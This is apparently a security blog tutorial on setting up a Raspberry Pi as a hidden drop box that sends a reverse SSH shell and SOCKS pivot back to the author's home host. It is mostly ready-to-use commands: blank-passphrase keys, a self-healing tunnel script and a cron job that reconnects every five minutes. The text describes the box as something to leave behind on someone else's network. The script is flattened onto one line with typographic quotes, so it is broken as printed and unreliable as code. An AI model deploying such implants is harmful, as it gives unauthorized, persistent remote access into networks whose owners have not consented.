SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

        In  this section I’ll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I’ve seen do.

• These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH:
  On Raspberry Pi use the following command :

        ssh -R 1974:localhost:22 [email protected]

• On PC (must have SSH server on box):

        ssh -D 1080 -p 1974 [email protected]

The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis’s network with.

Automating it

    Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

        ssh-keygen -t rsa

Use a blank passphrase. This next line is to copy of the key to the PC

        cat ~/.ssh/id_rsa.pub | ssh [email protected] “cat – >> ~/.ssh/authorized_keys” 

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

#!/bin/sh # Based on http://www.brandonhutchinson.com/ssh_tunnelling.html # $REMOTE_HOST is the name of the remote system REMOTE_HOST=home.irongeek.com   # Setting my username for home box, you will most likely want to change this USER_NAME=root   # $REMOTE_PORT is the remote port number that will be used to tunnel # back to this system REMOTE_PORT=1974   # $COMMAND is the command used to create the reverse ssh tunnel COMMAND=”ssh -q -N -R $REMOTE_PORT:localhost:22 [email protected]$REMOTE_HOST”   # Is the tunnel up? Perform two tests:   # 1. Check for relevant process ($COMMAND) pgrep -f -x “$COMMAND” > /dev/null 2>&1 || $COMMAND   # 2. Test tunnel by looking at “netstat” output on $REMOTE_HOST ssh $REMOTE_HOST netstat -an | egrep “tcp.*:$REMOTE_PORT.*LISTEN” \ > /dev/null 2>&1 if [ $? -ne 0 ] ; then pkill -f -x “$COMMAND” $COMMAND fi

 and set it as executable with:

                    chmod 755 autossh

3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh
SSH Automatic Script

4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:

        ssh –D 1080 -p 1974 [email protected]

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.